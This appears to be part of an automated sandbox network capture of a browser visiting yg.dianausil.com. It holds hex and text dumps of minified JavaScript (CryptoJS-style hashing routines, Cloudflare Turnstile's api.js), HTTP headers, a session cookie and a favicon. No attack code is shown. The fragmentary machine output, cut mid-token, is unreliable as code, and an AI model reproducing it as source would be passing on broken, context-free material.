                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30
                                                                      Data Ascii: for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16|I[0
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66
                                                                      Data Ascii: r,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:f
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                                      Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                                      Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                      Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.649744104.18.95.414431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:05 UTC688OUTGET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1
                                                                      Host: challenges.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: script
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://yg.dianausil.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:05 UTC471INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:30:05 GMT
                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                      Content-Length: 48239
                                                                      Connection: close
                                                                      accept-ranges: bytes
                                                                      last-modified: Fri, 28 Feb 2025 15:24:08 GMT
                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                      access-control-allow-origin: *
                                                                      cross-origin-resource-policy: cross-origin
                                                                      Server: cloudflare
                                                                      CF-RAY: 922c4adc19fb814d-FRA
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:30:05 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74
                                                                      Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75
                                                                      Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                      Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)||Bt(e,t)||Xt(e,t)||Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72
                                                                      Data Ascii: manual",e.Auto="auto"})(ee||(ee={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce||(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q||(Q={}));var me;(function(e){e.Render
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74
                                                                      Data Ascii: unction pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"||Nr.test
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 72 22 2c 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22
                                                                      Data Ascii: r","ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77
                                                                      Data Ascii: ect.setPrototypeOf||function(o,c){return o.__proto__=c,o},te(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,w
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73
                                                                      Data Ascii: ,configurable:!0}}),te(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"||typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this
                                                                      2025-03-19 10:30:05 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28
                                                                      Data Ascii: unction(e,t,a){var o=Tt(t.params,!1),c="h/".concat("g","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.649745104.16.6.1894431476C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-03-19 10:30:05 UTC637OUTGET /favicon.png HTTP/1.1
                                                                      Host: developers.cloudflare.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua-platform: "Windows"
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                      sec-ch-ua-mobile: ?0
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: no-cors
                                                                      Sec-Fetch-Dest: image
                                                                      Sec-Fetch-Storage-Access: active
                                                                      Referer: https://yg.dianausil.com/
                                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-03-19 10:30:05 UTC741INHTTP/1.1 200 OK
                                                                      Date: Wed, 19 Mar 2025 10:30:05 GMT
                                                                      Content-Type: image/png
                                                                      Content-Length: 937
                                                                      Connection: close
                                                                      Server: cloudflare
                                                                      Access-Control-Allow-Origin: *
                                                                      Cf-Cache-Status: HIT
                                                                      Cache-Control: public, max-age=0, must-revalidate
                                                                      Etag: "6be7ff94b6151f8cfbf08b53a17e2ac1"
                                                                      Cf-Ray: 922c4add692dbbef-FRA
                                                                      Strict-Transport-Security: max-age=15552000; preload
                                                                      X-Content-Type-Options: nosniff
                                                                      Set-Cookie: __cf_bm=baUZHYVlkzDWHdtjPGRPAlXsRMlLkH3dcBB7aW8tGgE-1742380205-1.0.1.1-fKLznBsqT02FLvhayWl8hMdyCQhnycF19IVsdlB2oUdYbQLZAYtPUlzii7wOZw2yBIshojXraHd9oT7rsxAq1lNjFSs.hHsFwEx2eZcsn4A; HttpOnly; SameSite=None; Secure; Path=/; Domain=developers.cloudflare.com; Expires=Wed, 19 Mar 2025 11:00:05 GMT
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2025-03-19 10:30:05 UTC628INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 03 5b 49 44 41 54 58 c3 ed 96 4b 48 54 51 18 c7 67 e6 86 91 04 d1 26 e8 a1 d7 c9 02 21 70 59 2d d4 71 d4 96 2d 42 93 48 82 08 a3 16 51 60 48 59 99 77 4c a7 4c ed b1 0d 8a da 44 a4 e6 a3 b2 a8 a8 4d bb 68 53 8b 48 a2 77 b4 c9 8d 77 46 e7 de 79 7c fd bf 73 cf 9d 39 8e 8f 32 85 36 73 e0 c7 77 e7 dc c7 ff ff 7d df 39 f7 8e c7 93 1b b9 b1 c0 11 6d f7 7b 22 a1 22 71 cc 51 85 c7 78 f3 5a 4f a4 bd 68 e9 85 55 11 79 ec 33 0d 5d 03 5e b3 4d f7 20 fa 30 a7 01 ef 44 37 4c 1a 99 eb 97 44 dc cc 88 b3 b0 77 de eb 0d 61 24 7d 2f 75 fa 17 29 6e e8 ee b1 a6 cc 07 40 17 18 04 a3 e0 06 38 08 56 f3 79 36 a9 9a
                                                                      Data Ascii: PNGIHDR szzpHYs~[IDATXKHTQg&!pY-q-BHQ`HYwLLDMhSHwwFy|s926sw}9m{""qQxZOhUy3]^M 0D7LDwa$}/u)n@8Vy6
